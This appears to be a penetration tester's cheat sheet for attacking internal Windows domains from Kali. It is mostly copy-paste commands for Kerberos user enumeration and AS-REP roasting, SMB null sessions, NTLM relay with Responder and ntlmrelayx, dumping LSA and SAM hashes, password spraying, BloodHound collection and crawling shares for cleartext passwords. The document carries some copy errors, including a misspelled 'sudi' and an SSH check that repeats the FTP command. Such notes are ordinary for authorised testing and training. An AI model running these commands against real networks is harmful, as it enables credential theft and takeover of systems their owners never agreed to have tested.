Internal (Kali)

Starting with some NMap Scans/Scripts we can find plenty of other information for more targeted attacks and finding other attack paths/vectors. Then depending if we were given user credentials to perform a "compromised user" approach, we can go down other paths, but either way we would want to check for all of these with and without credentials.

User Enumeration

Without already being given user credentials, we can try to find some using Kerbrute, and GetNPUsers.py. These methods can be loud but still effective.

• Kerbrute - A little louder

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

./kerbrute_linux_amd64 userenum -d DOMAIN --dc DC-IP USERLIST.txt -v -o Outfile.txt

• GetNPUsers.py - Can be stealthy but not always.

GetNPUsers.py DOMAIN/ -usersfile USERLIST.txt -dc-ip DC-IP -no-pass

SMB Null Sessions

I like to use SMBCrunch(SMBHunt.pl), and Netexec

• SMBCrunch

git clone https://github.com/Raikia/SMBCrunch.git && cd SMBCrunch

sudo ./smbhunt.pl -i ../445.txt

• Netexec

sudi netexec smb <target-ip> -u "" -p "" --shares

• View Null sessions with

sudo smbclient -L //target/share -U ""

SMB Relays

If SMB Signing is not Required for multiple machines, we can attempt to abuse SMB Relays with Responder, NTLMRelayX (From Impacket), and Proxychains.

1. Disable SMB and HTTP in Responder.conf (/etc/responder/Responder.conf):

sudo sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf

sudo sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf

1. Change the proxychains config (/etc/proxychains4.conf)

sudo sed -i 's/9050/1080/g' /etc/proxychains4.conf

1. Use NetExec to generate a list of hosts that has SMB signing not required (--gen-relay-list)

sudo netexec smb up-hosts.txt --gen-relay-list relay.txt

1. Run Responder

sudo python3 /usr/share/responder/Responder.py -I eth0 -PDv --lm

1. Run NTLMRelayX in a new window/tab while Responder is running.

sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf relay.txt -socks -smb2support -i -of relyed-hashes.txt

When we have capture relays, we can try and crack the captured hashed, but while we crack them we can abuse the relays using NetExec.

• View Shares hosted on target machine

sudo proxychains4 netexec smb ip -u user -p '' --shares

• Dump LSA

sudo proxychains4 netexec smb ip -u user -p '' --lsa

Dump SAM hashes

sudo proxychains4 netexec smb ip -u user -p '' --sam

General Enumeration

Finding Domain Controller IP. These aren't guaranteed but can be used in most cases.

• Using NSLookup

nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>

• Using DIG

dig _ldap._tcp.dc._msdcs.<domain> SRV

• Checking /etc/resolv.conf

cat /etc/resolv.conf

Web Services

• Look at all http/https pages for login pages, information disclosure, default login credentials, robots.txt, and other directories.

• Ffuf

  • Will need a fuzzling wordlist list, such as Seclists

sudo ffuf -recursion -mc all -ac -c -e https://domain/FUZZ -w wordlist.txt

sudo ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w wordlist.txt -u https://domain/FUZZ -fc 400,401,403,404,406,500,502 > domain.txt

FTP

Checking if FTP is open, and if anonymous login is enabled.

sudo nmap -p 21 --script ftp-anon -iL 21.txt

SSH

Checking if SSH is open and if it takes password authentication.

sudo nmap -p 21 --script ftp-anon -iL 21.txt

Password Spraying

SMB

• SMBSpray

git clone https://github.com/absolomb/smbspray.git && cd smbspray

python3 smbspray.py -u users.txt -p passwords.txt -ip DC-IP

SSH

• Using hydra

hydra -L users.txt -P passwords.txt ssh://IP

Post Exploitation

Once we have obtained credentials we can find even more info. I like to find more info from: LDAPDomainDump, Bloodhound (Bloodhound.py), and Manspider.

Bloodhound / Bloodhound-Python

sudo bloodhound-python -u USER -p PASSWORD -ns DNS Server -d DOMAIN -c All

Once we have the .json files, we can ingest them into bloodhound to look for domain admins, kerberoastable accounts, and more.

LDAPDomainDump

sudo ldapdomaindump -u DOMAIN\\USER -p PASSWORD IP

ManSpider

Crawl network shares to find any helpful info, such as files with cleartext passwords, password databases, and more.

• Install

pipx install git+https://github.com/blacklanternsecurity/MANSPIDER

• Search hostname/IP for files with "passw" in the name:

manspider TARGET -f passw -d DOMAIN -u USER -p 'PASSWORD'

• Search for documents containing passwords

manspider TAGRGET -c passw -d DOMAIN -u USER -p 'PASSWORD'